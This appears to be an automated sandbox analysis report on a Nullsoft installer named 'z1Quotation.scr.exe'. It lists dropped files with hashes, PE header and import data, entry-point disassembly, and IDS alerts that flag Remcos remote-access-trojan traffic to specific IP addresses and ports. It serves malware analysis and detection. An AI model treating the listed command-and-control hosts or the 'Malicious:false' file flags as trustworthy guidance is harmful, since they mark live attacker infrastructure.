                                                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                Malicious:false
                                                                                                                Preview:..
                                                                                                                Process:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):12288
                                                                                                                Entropy (8bit):5.745485478359495
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:
                                                                                                                MD5:DD87A973E01C5D9F8E0FCC81A0AF7C7A
                                                                                                                SHA1:C9206CED48D1E5BC648B1D0F54CCCC18BF643A14
                                                                                                                SHA-256:7FB0F8D452FEFAAC789986B933DF050F3D3E4FEB8A8D9944ADA995F572DCDCA1
                                                                                                                SHA-512:4910B39B1A99622AC8B3C42F173BBE7035AC2F8D40C946468E7DB7E2868A2DA81EA94DA453857F06F39957DD690C7F1BA498936A7AAA0039975E472376F92E8F
                                                                                                                Malicious:false
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Joe Sandbox View:
                                                                                                                • Filename: Teosofis.exe, Detection: malicious, Browse
                                                                                                                • Filename: Appetisement56.exe, Detection: malicious, Browse
                                                                                                                • Filename: Sparkler.exe, Detection: malicious, Browse
                                                                                                                • Filename: Revived.exe, Detection: malicious, Browse
                                                                                                                • Filename: Graphitoid.exe, Detection: malicious, Browse
                                                                                                                • Filename: Teosofis.exe, Detection: malicious, Browse
                                                                                                                • Filename: Sparkler.exe, Detection: malicious, Browse
                                                                                                                • Filename: Appetisement56.exe, Detection: malicious, Browse
                                                                                                                • Filename: Revived.exe, Detection: malicious, Browse
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L...N.d...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...h....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):6656
                                                                                                                Entropy (8bit):5.179045770990221
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:
                                                                                                                MD5:6C881F00BA860B17821D8813AA34DBC6
                                                                                                                SHA1:0E5A1E09B1CE1BC758D6977B913A8D9CCBE52A13
                                                                                                                SHA-256:BCB93204BD1854D0C34FA30883BAB51F6813AB32ABF7FB7D4AEED21D71F6AF87
                                                                                                                SHA-512:C78D6F43AA9BB35260A7BD300392CE809282660283FA6CB3059BAE50D6DB229B0B853CAB7C949D4BDF19309FB183257B1C9FEB01A66347E1C0ADEB21543315B6
                                                                                                                Malicious:false
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Joe Sandbox View:
                                                                                                                • Filename: SOuJyjzbcV.exe, Detection: malicious, Browse
                                                                                                                • Filename: goCj2yHUGx.exe, Detection: malicious, Browse
                                                                                                                • Filename: FcMubiUTN1.exe, Detection: malicious, Browse
                                                                                                                • Filename: oEijqRFE2K.exe, Detection: malicious, Browse
                                                                                                                • Filename: SOuJyjzbcV.exe, Detection: malicious, Browse
                                                                                                                • Filename: goCj2yHUGx.exe, Detection: malicious, Browse
                                                                                                                • Filename: FcMubiUTN1.exe, Detection: malicious, Browse
                                                                                                                • Filename: LM1UOHhZYE.exe, Detection: malicious, Browse
                                                                                                                • Filename: LM1UOHhZYE.exe, Detection: malicious, Browse
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........PE..L...L.d...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1901521
                                                                                                                Entropy (8bit):2.1309615870760013
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:
                                                                                                                MD5:093CE583E71B80F94A30C94906D92846
                                                                                                                SHA1:E7FC4D5B27DD70165A933E96FFB71C89418C5A06
                                                                                                                SHA-256:1DC5F8FCCE3120363BEE8FE820BBDAEB6E14CECF8E198542557734A1717977F1
                                                                                                                SHA-512:ECA97B849591681A7C052671709D99AE48D1159DBE92011553A4CDBF11623311A616AE4C0536084C9FEC79E7B66BC5CDFF4BD534A6B36D60E108645A9514E4BB
                                                                                                                Malicious:false
                                                                                                                Process:C:\Windows\SysWOW64\dxdiag.exe
                                                                                                                File Type:ISO-8859 text, with very long lines (1240), with CRLF, LF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):54335
                                                                                                                Entropy (8bit):5.606165578281984
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:
                                                                                                                MD5:BBC6827625A36E37DACB6ED2734BF584
                                                                                                                SHA1:41E5066941509F21292BC58EA31B7FDD54698104
                                                                                                                SHA-256:35605DBACA6D63D105456C414968796F06F2AD168966C9F35CF3469F15828EE3
                                                                                                                SHA-512:1D2AD4E0214B3A18274690C07888F2B9DEE99060BD7781E56CB150196DDF6E686C08879974756669A76A1598E51F040C4EE99C34E159FBC531FBFC57B7732565
                                                                                                                Malicious:false
                                                                                                                Preview:------------------..System Information..------------------.. Time of this report: 9/30/2024, 06:08:41.. Machine name: 088753.. Machine Id: Unknown.. Operating System: Windows 10 Pro 64-bit (10.0, Build 19042) (19041.vb_release.191206-1406).. Language: English (Regional Setting: English).. System Manufacturer: To Be Filled By O.E.M... System Model: To Be Filled By O.E.M... BIOS: Default System BIOS (type: UEFI).. Processor: Intel(R) Core(TM) i9-9900K CPU @ 3.60GHz (16 CPUs), ~3.6GHz.. Memory: 16384MB RAM.. Available OS Memory: 15900MB RAM.. Page File: 3374MB used, 28909MB available.. Windows Dir: C:\Windows.. DirectX Version: DirectX 12.. DX Setup Parameters: Not found.. User DPI Setting: 96 DPI (100 percent).. System DPI Setting: 96 DPI (100 percent).. DWM DPI Scaling: Disabled..
                                                                                                                Process:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2
                                                                                                                Entropy (8bit):1.0
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:
                                                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                Malicious:false
                                                                                                                Preview:..
                                                                                                                Process:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):5545
                                                                                                                Entropy (8bit):4.73182598865843
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:
                                                                                                                MD5:8A7A03C9326FFC560B73C739A897A323
                                                                                                                SHA1:2C86B6D39B2DA8AB87942D450E20F199AA41EB83
                                                                                                                SHA-256:ADB4889CF77CD15AA20D35C6814FC895AE4A2226A84E8341BDFC03959838420F
                                                                                                                SHA-512:36FEE6D2619284B33EDEEF0A890E8FFF27D745B1FC0B18BE1EF9230F47094AF2FA4DA24EF08269C55F55E8AA63A3338930DD258C9650DB45424E0FEC11AFEFE9
                                                                                                                Malicious:false
                                                                                                                Process:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):416801
                                                                                                                Entropy (8bit):1.2548832627710584
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:
                                                                                                                MD5:6D7CAD86AAC0A74C29F3796365622A71
                                                                                                                SHA1:C6567889AEC60BB631D49268A92FCBAA6C153B7F
                                                                                                                SHA-256:4605B20A04549F7FBB2DE2A52AD5BDCCCA2ECC2B055CBF1FFCF4FFFCF3B630BE
                                                                                                                SHA-512:67B4E7F874945309ABAD3EBB4EF3F7B3CC8A1760EC030958CCD1AC5E4AD870A5A4C82EC968E523CC0C674373FAA247CDDC546BECDA596505F92C4A7B7B6177E2
                                                                                                                Malicious:false
                                                                                                                Process:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                File Type:DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 33554432.000000
                                                                                                                Category:dropped
                                                                                                                Size (bytes):169850
                                                                                                                Entropy (8bit):1.239128128570523
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:
                                                                                                                MD5:5C9D072769D223672E8B8296F37EC4E0
                                                                                                                SHA1:24C03AD82AC8F9A5F3A532E73D9B2D20286A87E7
                                                                                                                SHA-256:99149DF7E611348D78576E332056846C7D8F55D52BADD6F20DF3470668BF2C9B
                                                                                                                SHA-512:D7B406E021A47D967BCA2A915EE85CBBCB56A79833767F3ED02625904BB6CB33B48C84D185E776614E034921B1B316E9BAC0B15C159BCC22472100E6C0D65864
                                                                                                                Malicious:false
                                                                                                                Process:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):212153
                                                                                                                Entropy (8bit):1.2589215152432
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:
                                                                                                                MD5:C7688273DD442CA5AFAF3620ED9CD5EC
                                                                                                                SHA1:E57D04092BD94EBA3D9712BFB77921B9193D47EC
                                                                                                                SHA-256:B27B92BB984761CB945B257717D3A1E7DF5BD2D7E44F34B31501FB1165CDBA8F
                                                                                                                SHA-512:1AD90075674A1415209C89F2F784CCABE641D667D0BBA59A6A806D377F28D5076BCA72C1B8084A4B4B9F9F288D5790A3C65AC6EB99A5E7F519666C0FC4694499
                                                                                                                Malicious:false
                                                                                                                Process:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):427282
                                                                                                                Entropy (8bit):1.2479910345314456
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:
                                                                                                                MD5:5B7F5B5A204CD4C13DFF4D1A2BF3A2FF
                                                                                                                SHA1:C82B59017B12848265F3E5253D7B2C375A642602
                                                                                                                SHA-256:E2E0BF5E5850F022CA997045B11D7CCB9AECE19914280CBA562E2D0500AB32A0
                                                                                                                SHA-512:B62108EA5758D0297D1336B7A5962172AF8F47BD87843ED688D40948667DAB21C963E90767F3C984677E0BCA24E7AA676239271B0151D4E79D2B3FEEAAB2B433
                                                                                                                Malicious:false
                                                                                                                Process:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):8388
                                                                                                                Entropy (8bit):1.226214966040589
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:
                                                                                                                MD5:D8F6164D5B626B750056F5C086263BFE
                                                                                                                SHA1:77BAEA4CD35680E7D8215AB4B8BDD1662C809A70
                                                                                                                SHA-256:593257E9FE0C432305F9DE6641FB76AED417ACE94A0C8E911BA4619CFA6C9D49
                                                                                                                SHA-512:E22D8D09390E0FDFD44AEF0E8D46B1309531B3613C4B59DE76950D303BE1178C0B7950E3D1110A5D0AFA8A26AAFB3ED59C3FB90652680EED6EE187E3857A1F32
                                                                                                                Malicious:false
                                                                                                                Process:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):320
                                                                                                                Entropy (8bit):4.362392769681322
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:
                                                                                                                MD5:031601AA1EF3929271B263AABF32109A
                                                                                                                SHA1:0C40BBCB0943544337A8FADC54B64A07806DD223
                                                                                                                SHA-256:6D1F244D7BF046A00BF753BD308ADC08813A8077FE52D88466989F984CB7F39B
                                                                                                                SHA-512:5F3358204BDAB2C313EA60FBACF10AA1464F431760744804DAF7152391019AEC7C81106CD38DF04D4A7459F36B17EB43B81CCCE009D0D1012E5BC37FB3FEC132
                                                                                                                Malicious:false
                                                                                                                Preview:harmonikasengs bommerters homicide,genitivform indtjenende extracultural brandbomben.kulturkampen ubrdelig immaculateness.adjustive cearin ekspeditrens wiktorias vexatious infrabuccal insertion..cheekless tilkendegiver ministrenes algebraization bundfalds asha.precolours haematoxylin gymnasielrere monachate cliqueless.
                                                                                                                Process:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):161648
                                                                                                                Entropy (8bit):7.713423806850711
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:
                                                                                                                MD5:3B8848BFA32D722E66415A6B52006D53
                                                                                                                SHA1:2159FF7F93EA11FB5727CBC82C3347628FADA0B0
                                                                                                                SHA-256:31AAE243F3FDAD5434B88B0C1C74CDA9E55989991CC56C97A8832F4F7F3EC813
                                                                                                                SHA-512:1A1519249911C5F70DB480A4BAE7E957258E2892A71E7F7821A08E24CFB204B463529E46CB1B78BAE5E39877F5861350CD36D3E2C712C468900E2F392744D7DC
                                                                                                                Malicious:false
                                                                                                                Process:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):471757
                                                                                                                Entropy (8bit):1.25205548882929
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:
                                                                                                                MD5:CF0D2A3273A8B26DB0A56DA0A08A125A
                                                                                                                SHA1:0B4C271C9BB3371D17C3E2014043703339026CE2
                                                                                                                SHA-256:375969793A510667A00C2CFA05960DE73D89525B56ABBEAB7F46D66CA35A3E68
                                                                                                                SHA-512:5C516DD2E0283AFA7636D3D31AAC9A5B4D0EB4657EF62052E81E0E4CBF42382B791DDEA370ECF85A2FAF2856FB0CB45FB95FE8D4959FE5AA223EA6DB0EE48D22
                                                                                                                Malicious:false
                                                                                                                Process:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):32768
                                                                                                                Entropy (8bit):0.017262956703125623
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:
                                                                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                Malicious:false
                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                Entropy (8bit):7.750682949543089
                                                                                                                TrID:
                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                File name:z1Quotation.scr.exe
                                                                                                                File size:583'221 bytes
                                                                                                                MD5:0a648622633dbd21fef151b525657b2c
                                                                                                                SHA1:49a34b496d78054a1b6404dd04d9be60d071ae52
                                                                                                                SHA256:3cc2813b0ce3a69bd64acdbe194fa68e067a150626cf45e665a27836f39ac39d
                                                                                                                SHA512:4cf0488f7fdea3047994e6ca7ce94febd36c861a45c7765f9b30d194e844f8a9af87b317f6517f585dbcd65494bf013acf7fc96082fb42d22382b897126602f8
                                                                                                                SSDEEP:12288:oXXiVMOWJOcSBkCedZpqPT5YkxBsdQ6jv2:KXiSjJO7B10DqPT5GNT2
                                                                                                                TLSH:75C4010777646835CA3E5AF062B70BCE97684C2B0E11450F2BB97B262DB1317AD1E5CE
                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.w.F.*.....F...v...F...@...F.Rich..F.........PE..L...e..d.................d...........4............@
                                                                                                                Icon Hash:040709554dcc390f
                                                                                                                Entrypoint:0x4034d1
                                                                                                                Entrypoint Section:.text
                                                                                                                Digitally signed:false
                                                                                                                Imagebase:0x400000
                                                                                                                Subsystem:windows gui
                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                Time Stamp:0x64A0DC65 [Sun Jul 2 02:09:41 2023 UTC]
                                                                                                                TLS Callbacks:
                                                                                                                CLR (.Net) Version:
                                                                                                                OS Version Major:4
                                                                                                                OS Version Minor:0
                                                                                                                File Version Major:4
                                                                                                                File Version Minor:0
                                                                                                                Subsystem Version Major:4
                                                                                                                Subsystem Version Minor:0
                                                                                                                Import Hash:0293eec0b5432ad092f24065016203b2
                                                                                                                Instruction
                                                                                                                push ebp
                                                                                                                mov ebp, esp
                                                                                                                sub esp, 00000224h
                                                                                                                push esi
                                                                                                                push edi
                                                                                                                xor edi, edi
                                                                                                                push 00008001h
                                                                                                                mov dword ptr [ebp-14h], edi
                                                                                                                mov dword ptr [ebp-0Ch], 0040A130h
                                                                                                                mov dword ptr [ebp-08h], edi
                                                                                                                mov byte ptr [ebp-04h], 00000020h
                                                                                                                call dword ptr [00408094h]
                                                                                                                mov esi, dword ptr [00408098h]
                                                                                                                lea eax, dword ptr [ebp-000000C4h]
                                                                                                                push eax
                                                                                                                mov dword ptr [ebp-000000B0h], edi
                                                                                                                mov dword ptr [ebp-30h], edi
                                                                                                                mov dword ptr [ebp-2Ch], edi
                                                                                                                mov dword ptr [ebp-000000C4h], 0000009Ch
                                                                                                                call esi
                                                                                                                test eax, eax
                                                                                                                jne 00007F5ACCCA03C1h
                                                                                                                lea eax, dword ptr [ebp-000000C4h]
                                                                                                                mov dword ptr [ebp-000000C4h], 00000094h
                                                                                                                push eax
                                                                                                                call esi
                                                                                                                cmp dword ptr [ebp-000000B4h], 02h
                                                                                                                jne 00007F5ACCCA03ACh
                                                                                                                movsx cx, byte ptr [ebp-000000A3h]
                                                                                                                mov al, byte ptr [ebp-000000B0h]
                                                                                                                sub ecx, 30h
                                                                                                                sub al, 53h
                                                                                                                mov byte ptr [ebp-2Ah], 00000004h
                                                                                                                neg al
                                                                                                                sbb eax, eax
                                                                                                                not eax
                                                                                                                and eax, ecx
                                                                                                                mov word ptr [ebp-30h], ax
                                                                                                                cmp dword ptr [ebp-000000B4h], 02h
                                                                                                                jnc 00007F5ACCCA03A4h
                                                                                                                and byte ptr [ebp-2Ah], 00000000h
                                                                                                                cmp byte ptr [ebp-000000AFh], 00000041h
                                                                                                                jl 00007F5ACCCA0393h
                                                                                                                movsx ax, byte ptr [ebp-000000AFh]
                                                                                                                sub eax, 40h
                                                                                                                mov word ptr [ebp-30h], ax
                                                                                                                jmp 00007F5ACCCA0386h
                                                                                                                mov word ptr [ebp-30h], di
                                                                                                                cmp dword ptr [ebp-000000C0h], 0Ah
                                                                                                                jnc 00007F5ACCCA038Ah
                                                                                                                and word ptr [ebp+00000000h], 0000h
                                                                                                                Programming Language:
                                                                                                                • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8430 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x37000 | 0x14d80 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x294 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x63d1 | 0x6400 | 83403cf301b935fec3006a8489b7d492 | False | 0.66859375 | data | 6.443410168182584 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x1234 | 0x1400 | 3c475f0d07d8baa23af20787c8b2799b | False | 0.4265625 | data | 5.027896508511247 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x1a458 | 0x600 | 9669ccd1d90a83bd841433b38a490114 | False | 0.4446614583333333 | data | 4.097544530535614 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x25000 | 0x12000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x37000 | 0x14d80 | 0x14e00 | b26481608d5ce113503bdb7b7ec08cb5 | False | 0.22550991766467066 | data | 4.966130506133016 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x37268 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 0 | English | United States | 0.18410623447296817
RT_ICON | 0x47a90 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.3510373443983402
RT_ICON | 0x4a038 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.3698405253283302
RT_ICON | 0x4b0e0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.49645390070921985
RT_DIALOG | 0x4b548 | 0x120 | data | English | United States | 0.5138888888888888
RT_DIALOG | 0x4b668 | 0x11c | data | English | United States | 0.6091549295774648
RT_DIALOG | 0x4b788 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x4b7e8 | 0x3e | data | English | United States | 0.8387096774193549
RT_VERSION | 0x4b828 | 0x214 | data | English | United States | 0.5488721804511278
RT_MANIFEST | 0x4ba40 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
DLL | Import
ADVAPI32.dll | RegEnumValueA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, RegOpenKeyExA, RegCreateKeyExA
SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteExA
ole32.dll | OleUninitialize, OleInitialize, IIDFromString, CoCreateInstance, CoTaskMemFree
COMCTL32.dll | ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll | SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcA, GetMessagePos, CheckDlgButton, LoadCursorA, SetCursor, GetSysColor, SetWindowPos, GetWindowLongA, IsWindowEnabled, SetClassLongA, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetDlgItemTextA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, MessageBoxIndirectA, CharPrevA, PeekMessageA, GetClassInfoA, DispatchMessageA, TrackPopupMenu
GDI32.dll | GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor
KERNEL32.dll | CreateProcessA, RemoveDirectoryA, GetTempFileNameA, CreateDirectoryA, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceA, lstrcpynA, SetErrorMode, GetVersionExA, lstrlenA, GetCommandLineA, GetTempPathA, GetWindowsDirectoryA, SetEnvironmentVariableA, ExitProcess, WriteFile, GetCurrentProcess, ReadFile, GetModuleFileNameA, GetFileSize, CreateFileA, GetTickCount, Sleep, SetFileAttributesA, GetFileAttributesA, SetCurrentDirectoryA, MoveFileA, GetFullPathNameA, GetShortPathNameA, SearchPathA, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, GetModuleHandleA, LoadLibraryExA, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv, lstrcpyA, MoveFileExA, lstrcatA, WideCharToMultiByte, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CopyFileA
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-30T12:05:00.321579+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.11.20 | 49760 | 102.65.21.26 | 443 | TCP
2024-09-30T12:05:03.461127+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.11.20 | 49761 | 23.106.238.209 | 2404 | TCP
2024-09-30T12:05:05.296120+0200 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.11.20 | 49762 | 178.237.33.50 | 80 | TCP
2024-09-30T12:08:17.762243+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.11.20 | 49763 | 23.106.238.209 | 2404 | TCP
2024-09-30T12:08:18.090313+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.11.20 | 49764 | 23.106.238.209 | 2404 | TCP
2024-09-30T12:08:43.100498+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.11.20 | 49767 | 23.106.238.209 | 2404 | TCP
2024-09-30T12:08:50.927192+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.11.20 | 49768 | 23.106.238.209 | 2404 | TCP
2024-09-30T12:08:51.489322+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.11.20 | 49769 | 23.106.238.209 | 2404 | TCP
2024-09-30T12:09:07.407551+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.11.20 | 49770 | 23.106.238.209 | 2404 | TCP
2024-09-30T12:09:24.560134+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.11.20 | 49771 | 23.106.238.209 | 2404 | TCP
2024-09-30T12:09:51.882170+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.11.20 | 49774 | 23.106.238.209 | 2404 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                Sep 30, 2024 12:05:00.741377115 CEST44349760102.65.21.26192.168.11.20
                                                                                                                Sep 30, 2024 12:05:00.741621971 CEST49760443192.168.11.20102.65.21.26
                                                                                                                Sep 30, 2024 12:05:00.741621971 CEST49760443192.168.11.20102.65.21.26
                                                                                                                Sep 30, 2024 12:05:00.785521984 CEST44349760102.65.21.26192.168.11.20
                                                                                                                Sep 30, 2024 12:05:00.785783052 CEST49760443192.168.11.20102.65.21.26
